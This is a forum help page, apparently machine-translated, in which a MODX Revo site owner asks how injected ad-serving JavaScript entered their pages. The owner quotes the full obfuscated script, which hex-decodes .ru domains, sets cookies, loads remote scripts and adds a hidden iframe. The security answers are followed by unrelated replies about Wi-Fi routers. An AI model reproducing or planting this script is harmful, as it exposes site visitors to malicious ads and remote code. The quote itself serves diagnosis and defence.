Answer the question
In order to leave comments, you need to log in
What are the ways for malicious js code to enter the site?
Hello!
I work with CMF MODX Revo.
Already several times on different sites I find one malicious code that periodically displays ads on the site.
It is located in the code of the document itself.
When editing a document, the code, of course, is not displayed.
It can be seen if you look at the source code of the page (there is such an opportunity in a text editor).
Questions:
1. How can the code get to the site?
2. How to prevent such behavior in the future?
Screenshot with ad:
The code itself:
<p> </p>
<script type="text/javascript">// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse('["6e33646b337a72372e7275","673333746d3079792e7275"]'),e="",t="18167",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/pjs/"+t+"/c/"+c("kashiza.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
// ]]></script>
<p><iframe id="a1996667054" style="display: none;" src="https://ui5nvtxlm.ru/f.html" width="320" height="240"></iframe></p>
Answer the question
In order to leave comments, you need to log in
gets through vulnerabilities - always update scripts to the latest version, but other problems lie in plugins that are not so strictly checked for sql inject etc.
There is one very simple way - greed. The client takes "free hosting", and a valiant hoster can add anything to the issue. Including similar
I suppose that on the router it is worth manually setting which connection standard to use a, b, g or n.
And try to remove the auto-selection of the channel.
waffle works on the principle of "everyone works with the quality of the worst customer". This is fine.
I advise you to check 2 points:
1) set the standard N - the quality and range will be greater
2) check if a “repeater” is used on the devices. I often see this on laptops - the laptop receives a signal and retransmits it with the same SSID and at the same frequency. Moreover, if you sit in one office - the quality is up, and if there is at least a minimal obstacle - the quality is very much down. Unfortunately, I don't remember what it's called.
Didn't find what you were looking for?
Ask your questionAsk a Question
731 491 924 answers to any question